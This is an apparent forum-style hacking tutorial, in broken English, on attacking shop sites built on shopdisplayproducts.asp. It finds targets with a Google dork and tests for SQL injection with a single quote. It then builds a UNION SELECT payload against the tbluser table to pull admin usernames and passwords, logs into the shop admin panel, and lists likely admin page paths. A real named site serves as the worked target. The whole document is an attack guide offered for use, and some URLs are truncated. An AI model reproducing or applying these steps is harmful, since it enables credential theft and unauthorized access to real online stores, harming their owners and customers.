shop admin exploits

first go to google.com and put this

inurl:/shopdisplayproducts.asp

ok, now we find some site with shopdisplayproducts.asp

let see some site

http://www.globalasp.org.uk/store/s...ducts.asp?id=14

ok ... now we put on end of link this sign '

now link look like this

http://www.globalasp.org.uk/store/shopdisp....asp?id=14'

and we get error

products
mcft jet database engine error '80040e14'

syntax error in string in query expression 'cc.intcatalogid=p.catalogid and

cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by
specialoffer desc,cname'.

/store/shop$db.asp, line 467

if we see this error then is hackable ) !!!

ok ... now we removed '

http://www.globalasp.org.uk/store/s...ducts.asp?id=14

and on this add this

%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser'

link now is

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

and put it in the browser we get the same error !!!

ok ... now you see this numbers ...

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50

now we removed ,50

and we now test

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

the same error and now we removed and removed number, and when we don't see this
error we must see some site, on this server correct number for
exploit is -> 47 <-

http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> this you see 47 is

the end number

ok now we put this in browser and don't see error we see some laptops

ok ... now we find on that site numbers 3 and 4

they are small

when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword

now explotable link is this

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

and look where was 3 and 4 number now there are username and password for
login in shopadmin , now we are going to this link

http://www.globalasp.org.uk/store/colours$config.asp

there is login for shopadmin and we login !!!

this are path where can be shopadmins too

shopadmin.asp ----> this or ... with 1

shopadmin1.asp ----> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp